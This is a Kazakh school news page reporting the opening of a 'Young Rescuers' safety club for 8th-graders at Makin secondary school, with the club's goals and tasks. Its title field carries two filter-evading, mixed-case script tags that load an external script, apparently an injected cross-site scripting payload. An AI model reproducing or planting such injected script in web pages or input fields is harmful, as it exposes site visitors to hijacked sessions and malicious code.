«Жас құтқарушы»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

20.09.2019

18.09.2019 ж. «Макин орта мектебі» ММ-нде «Жас құтқарушылар» үйірмесі ашылды. Үйірменің ашылуына Макинка ауылының Өрт бөліміні жетекшісі Бапишев С.Р. пен Көкшетау қ-ның «Азаматтық қорғаныстың жоғарғы көп салалы колледжінің» 4-курс студенті, мектебіміздің түлегі Андриянов А. белсене қатысты. Бұл үйірме 8-сынып оқушыларына арналып ұйымдастырылған, жетекшісі – Абжанов Н.Д.

«Жас құтқарушы» үйірмесінің мақсаттары мен міндеттері:

Аталмыш үйірменің мақсаты:

  • Жасөспірімдердің өзара көмек қағидасына, адам мен табиғатқа деген махаббатына, жеке және ұжымдық қауіпсіздік мәселелеріне негізделген әскери-патриоттық тәрбиесін жетілдіру;
  • Тұлғаның жан-жақты және сауатты дамуы, физикалық және рухани сау адамды тәрбиелеу, логикалық және экономикалық ойлауды қалыптастыру.

Үйірменің негізгі міндеттері:

  • Жасөспірімдерді жеке және ұжымдық қауіпсіздік мәселелеріне жұмылдыру;
  • Өзіне және өзара көмек көрсету практикалық дағдыларына, кез келген төтенше жағдайда шебер әлі тез әрекет жасауға үйрету;
  • Жеке және ұжымдық қорғау құралдарын қолдану дағдысы мен шеберлікке үйрету
  • Жасөспірімдердің физикалық дайындығын жақсарту және оларды салауатты өмір салтына шақыру;
  • Балалардың, жасөспірімдер мен жастардың  отандық құқық нормаларымен анықталған құқығын қорғау және насихаттау;
  •  Төтенше жағдайда салауатты өмір салтын сақтау дағдыларын қорытындылау бойынша слет, сайыс түріндегі түрлі жаттықтырулар өткізу.
Просмотров: 1012


Пікір қосу



Деректерді қолтаңбаға қосу